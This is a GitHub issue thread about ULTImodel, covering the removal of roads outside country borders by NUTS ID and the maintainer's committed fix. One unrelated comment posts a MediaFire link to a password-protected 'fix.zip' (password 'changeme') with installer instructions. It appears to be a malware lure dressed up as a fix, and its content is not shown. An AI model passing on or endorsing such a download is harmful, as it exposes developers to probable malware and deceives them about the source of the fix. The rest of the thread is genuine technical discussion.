### ISSUE TITLE
Roads outside country borders

### ISSUE THREAD

**Issue by nthom-dlr** [DLR-VF/ULTImodel#10]
Currently, some roads outside of country borders are added to a country network. This leads to duplicate roads in the international network which are not used for routing.

With this issue, an option to remove roads with another country's NUTS ID is added.

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nthom-dlr** [comment]
Included option to 
- keep NAs and set NUTS ID to 0
- remove country roads with different country's NUTS ID

Open issue:
- might remove roads alongside borders depending on the granularity of the TAZ layer --> add condition road length > X km? (1,2)

**Comment by nthom-dlr** [comment]
Solved with 4c6b636bc9c6dd2253d587643bb60e9a30e94309
(option to keep NAs, option to remove foreign roads depending on their length)
